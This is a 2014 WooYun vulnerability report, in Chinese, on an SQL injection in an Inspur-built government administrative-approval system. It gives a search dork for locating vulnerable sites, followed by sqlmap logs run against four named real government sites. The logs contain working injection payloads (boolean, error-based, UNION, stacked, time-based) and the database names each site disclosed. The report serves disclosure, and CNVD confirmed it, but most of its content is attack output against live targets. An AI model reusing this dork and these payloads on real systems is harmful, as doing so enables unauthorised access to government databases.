当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063826

漏洞标题:某政府行政审批系统咨询处sql注入漏洞

相关厂商:山东浪潮齐鲁软件产业股份有限公司

漏洞作者: Mosuan

提交时间:2014-06-09 12:19

修复时间:2014-09-07 12:20

公开时间:2014-09-07 12:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-09: 细节已通知厂商并且等待厂商处理中
2014-06-14: 厂商已经确认,细节仅向厂商公开
2014-06-17: 细节向第三方安全合作伙伴开放
2014-08-08: 细节向核心白帽子及相关领域专家公开
2014-08-18: 细节向普通白帽子公开
2014-08-28: 细节向实习白帽子公开
2014-09-07: 细节向公众公开

简要描述:

女神是什么?

详细说明:

关键词

inurl:/OnlineQuery/QueryDetail.aspx?


关键词仅供参考
部分网站不存在注入,
可能是版本的原因。
举几个例子

注入地址:http://shenpi.yuzhou.gov.cn/OnlineQuery/QueryDetail.aspx?QueryId=487
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 22:47:53
[22:47:54] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\shenpi.yuzhou.gov.cn\session' as session file
[22:47:54] [INFO] testing connection to the target url
[22:47:57] [INFO] testing if the url is stable, wait a few seconds
[22:48:05] [INFO] url is stable
[22:48:05] [INFO] testing if GET parameter 'QueryId' is dynamic
[22:48:07] [INFO] confirming that GET parameter 'QueryId' is dynamic
[22:48:09] [WARNING] GET parameter 'QueryId' appears to be not dynamic
[22:48:11] [WARNING] heuristic test shows that GET parameter 'QueryId' might not
be injectable
[22:48:11] [INFO] testing sql injection on GET parameter 'QueryId'
[22:48:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:48:34] [INFO] GET parameter 'QueryId' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[22:48:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[22:48:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:48:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[22:48:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[22:48:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:48:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:48:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:48:53] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:48:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:48:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:49:05] [INFO] testing 'Oracle AND time-based blind'
[22:49:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[22:49:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[22:49:29] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[22:49:56] [INFO] checking if the injection point on GET parameter 'QueryId' is
a false positive
GET parameter 'QueryId' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] y
sqlmap identified the following injection points with a total of 48 HTTP(s) requ
ests:
---
Place: GET
Parameter: QueryId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: QueryId=487' AND 4801=4801 AND 'VWuB'='VWuB
---
[22:54:30] [INFO] testing MySQL
[22:54:30] [WARNING] the back-end DBMS is not MySQL
[22:54:30] [INFO] testing Oracle
[22:54:31] [WARNING] the back-end DBMS is not Oracle
[22:54:31] [INFO] testing PostgreSQL
[22:54:31] [WARNING] the back-end DBMS is not PostgreSQL
[22:54:31] [INFO] testing Microsoft SQL Server
[22:54:32] [INFO] confirming Microsoft SQL Server
[22:54:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[22:54:33] [INFO] fetching database names
[22:54:33] [INFO] fetching number of databases
[22:54:33] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[22:54:33] [INFO] retrieved: 10
[22:54:37] [INFO] retrieved: BizTalkHwsDb
[22:55:30] [INFO] retrieved: master
[22:56:22] [INFO] retrieved: model
[22:57:18] [INFO] retrieved: msdb
[22:58:25] [INFO] retrieved: NewEcgap
[22:59:35] [INFO] retrieved: Outportaldb
[23:00:53] [INFO] retrieved: ReportServer
[23:02:10] [INFO] retrieved: ReportServerTempDB
[23:04:04] [INFO] retrieved: tempdb
[23:04:40] [INFO] retrieved: WorkFlowDb
available databases [10]:
[*] BizTalkHwsDb
[*] master
[*] model
[*] msdb
[*] NewEcgap
[*] Outportaldb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WorkFlowDb
[23:05:42] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 407 times
[23:05:42] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\shenpi.yuzhou.gov.cn'


注入地址:http://lxsp.qingdao.gov.cn/OnlineQuery/QueryDetail.aspx?QueryId=808
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:07:53
[23:07:53] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\lxsp.qingdao.gov.cn\session' as session file
[23:07:53] [INFO] testing connection to the target url
[23:07:55] [INFO] testing if the url is stable, wait a few seconds
[23:07:57] [INFO] url is stable
[23:07:57] [INFO] testing if GET parameter 'QueryId' is dynamic
[23:07:57] [INFO] confirming that GET parameter 'QueryId' is dynamic
[23:07:58] [WARNING] GET parameter 'QueryId' appears to be not dynamic
[23:07:59] [INFO] heuristic test shows that GET parameter 'QueryId' might be inj
ectable (possible DBMS: Microsoft SQL Server)
[23:07:59] [INFO] testing sql injection on GET parameter 'QueryId'
[23:07:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:08:11] [INFO] GET parameter 'QueryId' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Ser
ver. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[23:08:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:08:14] [INFO] GET parameter 'QueryId' is 'Microsoft SQL Server/Sybase AND er
ror-based - WHERE or HAVING clause' injectable
[23:08:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:08:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:08:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:08:31] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[23:08:45] [INFO] target url appears to have 24 columns in query
[23:09:01] [INFO] GET parameter 'QueryId' is 'Generic UNION query (NULL) - 1 to
10 columns' injectable
GET parameter 'QueryId' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] y
sqlmap identified the following injection points with a total of 27 HTTP(s) requ
ests:
---
Place: GET
Parameter: QueryId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: QueryId=808' AND 6241=6241 AND 'bRis'='bRis
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: QueryId=808' AND 1042=CONVERT(INT,(CHAR(58)+CHAR(119)+CHAR(103)+CHA
R(109)+CHAR(58)+(SELECT (CASE WHEN (1042=1042) THEN CHAR(49) ELSE CHAR(48) END))
+CHAR(58)+CHAR(122)+CHAR(101)+CHAR(111)+CHAR(58))) AND 'jQwc'='jQwc
Type: UNION query
Title: Generic UNION query (NULL) - 24 columns
Payload: QueryId=808' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(119)+CHAR(103
)+CHAR(109)+CHAR(58)+CHAR(107)+CHAR(84)+CHAR(99)+CHAR(80)+CHAR(101)+CHAR(75)+CHA
R(98)+CHAR(104)+CHAR(81)+CHAR(82)+CHAR(58)+CHAR(122)+CHAR(101)+CHAR(111)+CHAR(58
), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'lXAv'='lXAv
---
[23:09:34] [INFO] testing Microsoft SQL Server
[23:09:36] [INFO] confirming Microsoft SQL Server
[23:09:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:09:42] [INFO] fetching database names
available databases [22]:
[*] bidding
[*] BizTalkhwsDb
[*] BizTalkhwsDb_test
[*] DataExPre
[*] Emonitor
[*] Emonitor_test
[*] InportalSwap
[*] InportalSwap_test
[*] master
[*] model
[*] msdb
[*] NewEcgap
[*] NewEcgap_test
[*] OutPortalDb
[*] OutPortalDb_test
[*] OutPortalSwap
[*] OutPortalSwap_test
[*] SwapDb
[*] SwapDb_test
[*] tempdb
[*] WorkFlowDB
[*] WorkFlowDB_test
[23:09:46] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 17 times
[23:09:46] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\lxsp.qingdao.gov.cn'


注入地址:http://www.qjxzsp.com/langchao.ecgap.outportal/OnlineQuery/QueryDetail.
aspx?QueryId=65
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:18:42
[23:18:42] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.qjxzsp.com\session' as session file
[23:18:42] [INFO] testing connection to the target url
[23:18:44] [INFO] testing if the url is stable, wait a few seconds
[23:18:46] [INFO] url is stable
[23:18:46] [INFO] testing if GET parameter 'QueryId' is dynamic
[23:18:47] [INFO] confirming that GET parameter 'QueryId' is dynamic
[23:18:47] [WARNING] GET parameter 'QueryId' appears to be not dynamic
[23:18:48] [INFO] heuristic test shows that GET parameter 'QueryId' might be inj
ectable (possible DBMS: Microsoft SQL Server)
[23:18:48] [INFO] testing sql injection on GET parameter 'QueryId'
[23:18:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:18:58] [INFO] GET parameter 'QueryId' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Ser
ver. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[23:19:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:19:13] [INFO] GET parameter 'QueryId' is 'Microsoft SQL Server/Sybase AND er
ror-based - WHERE or HAVING clause' injectable
[23:19:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:19:25] [INFO] GET parameter 'QueryId' is 'Microsoft SQL Server/Sybase stacke
d queries' injectable
[23:19:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:19:38] [INFO] GET parameter 'QueryId' is 'Microsoft SQL Server/Sybase time-b
ased blind' injectable
[23:19:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:19:40] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[23:19:47] [INFO] target url appears to have 24 columns in query
[23:19:53] [INFO] GET parameter 'QueryId' is 'Generic UNION query (NULL) - 1 to
10 columns' injectable
GET parameter 'QueryId' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] y
sqlmap identified the following injection points with a total of 25 HTTP(s) requ
ests:
---
Place: GET
Parameter: QueryId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: QueryId=65' AND 5548=5548 AND 'DDRB'='DDRB
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: QueryId=65' AND 9984=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(97)+CHAR(
117)+CHAR(58)+(SELECT (CASE WHEN (9984=9984) THEN CHAR(49) ELSE CHAR(48) END))+C
HAR(58)+CHAR(100)+CHAR(108)+CHAR(117)+CHAR(58))) AND 'omKt'='omKt
Type: UNION query
Title: Generic UNION query (NULL) - 24 columns
Payload: QueryId=65' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NU
LL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+C
HAR(110)+CHAR(97)+CHAR(117)+CHAR(58)+CHAR(98)+CHAR(101)+CHAR(75)+CHAR(114)+CHAR(
71)+CHAR(81)+CHAR(77)+CHAR(103)+CHAR(74)+CHAR(77)+CHAR(58)+CHAR(100)+CHAR(108)+C
HAR(117)+CHAR(58), NULL, NULL, NULL, NULL, NULL-- AND 'Dwad'='Dwad
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: QueryId=65'; WAITFOR DELAY '0:0:5';-- AND 'AOEM'='AOEM
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: QueryId=65' WAITFOR DELAY '0:0:5'-- AND 'Qpwv'='Qpwv
---
[23:19:56] [INFO] testing Microsoft SQL Server
[23:19:57] [INFO] confirming Microsoft SQL Server
[23:19:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[23:19:59] [INFO] fetching database names
[23:20:00] [INFO] the SQL query used returns 14 entries
[23:20:01] [INFO] retrieved: "BizTalKHwsDb"
[23:20:02] [INFO] retrieved: "dzjc"
[23:20:03] [INFO] retrieved: "InPortalSwap"
[23:20:04] [INFO] retrieved: "master"
[23:20:06] [INFO] retrieved: "model"
[23:20:07] [INFO] retrieved: "msdb"
[23:20:07] [INFO] retrieved: "NewEcGap"
[23:20:09] [INFO] retrieved: "OutPortalDb"
[23:20:10] [INFO] retrieved: "OutPortalSwap"
[23:20:11] [INFO] retrieved: "SwapDB"
[23:20:12] [INFO] retrieved: "TaiJi"
[23:20:13] [INFO] retrieved: "tempdb"
[23:20:14] [INFO] retrieved: "test1"
[23:20:16] [INFO] retrieved: "WorkFlowDb"
available databases [14]:
[*] BizTalKHwsDb
[*] dzjc
[*] InPortalSwap
[*] master
[*] model
[*] msdb
[*] NewEcGap
[*] OutPortalDb
[*] OutPortalSwap
[*] SwapDB
[*] TaiJi
[*] tempdb
[*] test1
[*] WorkFlowDb
[23:20:16] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 36 times
[23:20:16] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.qjxzsp.com'


注入地址:http://shenpi.hengyang.gov.cn/langchao.ecgap.outportal/OnlineQuery/Quer
yDetail.aspx?QueryId=911
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:09:40
[23:09:40] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\shenpi.hengyang.gov.cn\session' as session file
[23:09:40] [INFO] testing connection to the target url
[23:09:40] [INFO] testing if the url is stable, wait a few seconds
[23:09:42] [INFO] url is stable
[23:09:42] [INFO] testing if GET parameter 'QueryId' is dynamic
[23:09:42] [INFO] confirming that GET parameter 'QueryId' is dynamic
[23:09:42] [WARNING] GET parameter 'QueryId' appears to be not dynamic
[23:09:43] [WARNING] heuristic test shows that GET parameter 'QueryId' might not
be injectable
[23:09:43] [INFO] testing sql injection on GET parameter 'QueryId'
[23:09:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:09:50] [INFO] GET parameter 'QueryId' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[23:09:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:09:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:09:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[23:09:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:09:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:09:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:09:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:09:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:10:01] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:10:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:10:07] [INFO] testing 'Oracle AND time-based blind'
[23:10:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:10:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:10:17] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[23:10:21] [INFO] checking if the injection point on GET parameter 'QueryId' is
a false positive
GET parameter 'QueryId' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] y
sqlmap identified the following injection points with a total of 48 HTTP(s) requ
ests:
---
Place: GET
Parameter: QueryId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: QueryId=911' AND 9352=9352 AND 'mUaM'='mUaM
---
[23:11:00] [INFO] testing MySQL
[23:11:01] [WARNING] the back-end DBMS is not MySQL
[23:11:01] [INFO] testing Oracle
[23:11:01] [WARNING] the back-end DBMS is not Oracle
[23:11:01] [INFO] testing PostgreSQL
[23:11:01] [WARNING] the back-end DBMS is not PostgreSQL
[23:11:01] [INFO] testing Microsoft SQL Server
[23:11:02] [INFO] confirming Microsoft SQL Server
[23:11:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[23:11:04] [INFO] fetching database names
[23:11:04] [INFO] fetching number of databases
[23:11:04] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[23:11:04] [INFO] retrieved: 9
[23:11:10] [INFO] retrieved: DataExPre
[23:11:49] [INFO] retrieved: DynamicProjectMgtDB
[23:13:17] [INFO] retrieved: master
[23:13:44] [INFO] retrieved: model
[23:14:12] [INFO] retrieved: msdb
[23:14:46] [INFO] retrieved: OutPortalDb
[23:16:08] [INFO] retrieved: ReportServer
[23:17:18] [INFO] retrieved: ReportServerTempDB
[23:19:35] [INFO] retrieved: tempdb
available databases [9]:
[*] DataExPre
[*] DynamicProjectMgtDB
[*] master
[*] model
[*] msdb
[*] OutPortalDb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[23:20:54] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 397 times
[23:20:54] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\shenpi.hengyang.gov.cn'


漏洞证明:

详细说明

修复方案:

你们懂的!

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-06-14 09:25

厂商回复:

CNVD确认并复现所述情况,已经由CNVD转报给软件生产厂商(此前已经有较多案例)。

最新状态:

暂无